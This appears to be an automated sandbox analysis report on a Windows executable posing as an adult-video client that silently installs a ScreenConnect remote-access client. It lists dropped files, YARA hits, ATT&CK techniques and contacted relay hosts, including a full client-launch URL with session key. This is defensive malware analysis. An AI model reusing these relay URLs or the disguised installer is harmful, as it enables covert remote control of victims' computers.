                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00371807
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 10.0.ScreenConnect.WindowsClient.exe.c50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2530078274.000000001B8E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 3060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7724, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7776, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter                  		1
                  DLL Search Order Hijacking                  		1
                  DLL Search Order Hijacking                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		2
                  Windows Service                  		2
                  Windows Service                  		1
                  Install Root Certificate                  		Security Account Manager24
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Timestomp                  		NTDS51
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture3
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit                  		1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		LSA Secrets2
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking                  		Cached Domain Credentials51
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579051 Sample: P0RN-vidz.Client.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 48 44 server-nixd2d85b70-web.screenconnect.com 2->44 46 server-nixd2d85b70-relay.screenconnect.com 2->46 48 4 other IPs or domains 2->48 60 .NET source code references suspicious native API functions 2->60 62 Detected potential unwanted application 2->62 64 Contains functionality to hide user accounts 2->64 9 P0RN-vidz.Client.exe 2 2->9         started        11 ScreenConnect.ClientService.exe 2->11         started        15 svchost.exe 8 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 19 dfsvc.exe 130 108 9->19         started        23 WerFault.exe 19 16 9->23         started        52 server-nixd2d85b70-relay.screenconnect.com 147.75.81.4, 443, 49813, 49820 PACKETUS Switzerland 11->52 68 Reads the Security eventlog 11->68 70 Reads the System eventlog 11->70 25 ScreenConnect.WindowsClient.exe 11->25         started        28 WerFault.exe 2 15->28         started        54 127.0.0.1 unknown unknown 17->54 signatures6 process7 dnsIp8 50 server-nixd2d85b70-web.screenconnect.com 147.75.81.6, 443, 49705, 49710 PACKETUS Switzerland 19->50 36 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 19->36 dropped 38 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 19->38 dropped 40 ScreenConnect.WindowsBackstageShell.exe, PE32 19->40 dropped 42 13 other files (none is malicious) 19->42 dropped 30 ScreenConnect.WindowsClient.exe 19 9 19->30         started        66 Contains functionality to hide user accounts 25->66 file9 signatures10 process11 signatures12 72 Contains functionality to hide user accounts 30->72 33 ScreenConnect.ClientService.exe 30->33         started        process13 signatures14 56 Contains functionality to hide user accounts 33->56 58 Enables network access during safeboot for specific services 33->58

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  No Antivirus matches

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..core_4b14c015c87c1ad8_0018.0004_none_53e91df7fcfd4a60\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..dows_4b14c015c87c1ad8_0018.0004_none_5860f5d9394b5d90\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9fe7bca0c4ca064\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..vice_4b14c015c87c1ad8_0018.0004_none_053cb64092bcadcb\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exe0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  server-nixd2d85b70-relay.screenconnect.com
                  		147.75.81.4
                  		truefalse
                    		unknown
                    server-nixd2d85b70-web.screenconnect.com
                    		147.75.81.6
                    		truefalse
                      		unknown
                      fp2e7a.wpc.phicdn.net
                      		192.229.221.95
                      		truefalse
                        		high
                        koidesfac.screenconnect.com
                        		unknown
                        		unknownfalse
                          		unknown
                          instance-l7g4dh-relay.screenconnect.com
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140false
                              		unknown
                              https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                                		unknown
                                https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.dllfalse
                                  		unknown
                                  https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exefalse
                                    		unknown
                                    https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.dllfalse
                                      		unknown
                                      https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                                        		unknown
                                        https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.manifestfalse
                                          		unknown
                                          https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.exefalse
                                            		unknown
                                            https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exe.configfalse
                                              		unknown
                                              https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exefalse
                                                		unknown
                                                https://koidesfac.screenconnect.com/Bin/ScreenConnect.Core.dllfalse
                                                  		unknown
                                                  https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://crl3.didfsvc.exe, 00000001.00000002.3003585301.0000020C26DA3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientSedfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.exe4dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe_dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exe.configfdfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://koidesfac.screenconnect.com/Bin/ScreenConnect.Core.dllL#dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://koidesfac.screenconnect.com/Bin/ScreenConnect.Windows.dllCdfsvc.exe, 00000001.00000002.3002950824.0000020C24EF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2043919389.0000018F2A460000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                                                                    		high
                                                                    https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exeLdfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://instance-l7g4dh-relay.screenconnect.com:443/RrScreenConnect.ClientService.exe, 0000000C.00000002.3278324089.0000000001490000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/09/policye.srfsvchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationstScreenConnect.WindowsClient.exe, 0000000A.00000002.2529863446.000000001B8C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.3003585301.0000020C26AE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.0000000002002000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://Passport.NET/tb_svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://koidesfac.screenconnect.comdfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C2730D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=svchost.exe, 00000007.00000003.2117104298.000001CCF8153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application089b0iOScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.00000000012C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.exeldfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application089ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2529863446.000000001B8C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationGScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://instance-l7g4dh-relay.screenconnect.com:443/vrScreenConnect.ClientService.exe, 0000000C.00000002.3278324089.0000000001490000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationHdfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://account.live.com/msangcwamsvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060578513.000001CCF8157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.w3.ordfsvc.exe, 00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26FC7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.ver)svchost.exe, 00000006.00000002.3282365944.0000018F2A600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278676068.000001CCF78D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxsvchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://passport.net/tbsvchost.exe, 00000007.00000002.3280179068.000001CCF865A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2374784781.000001CCF8609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
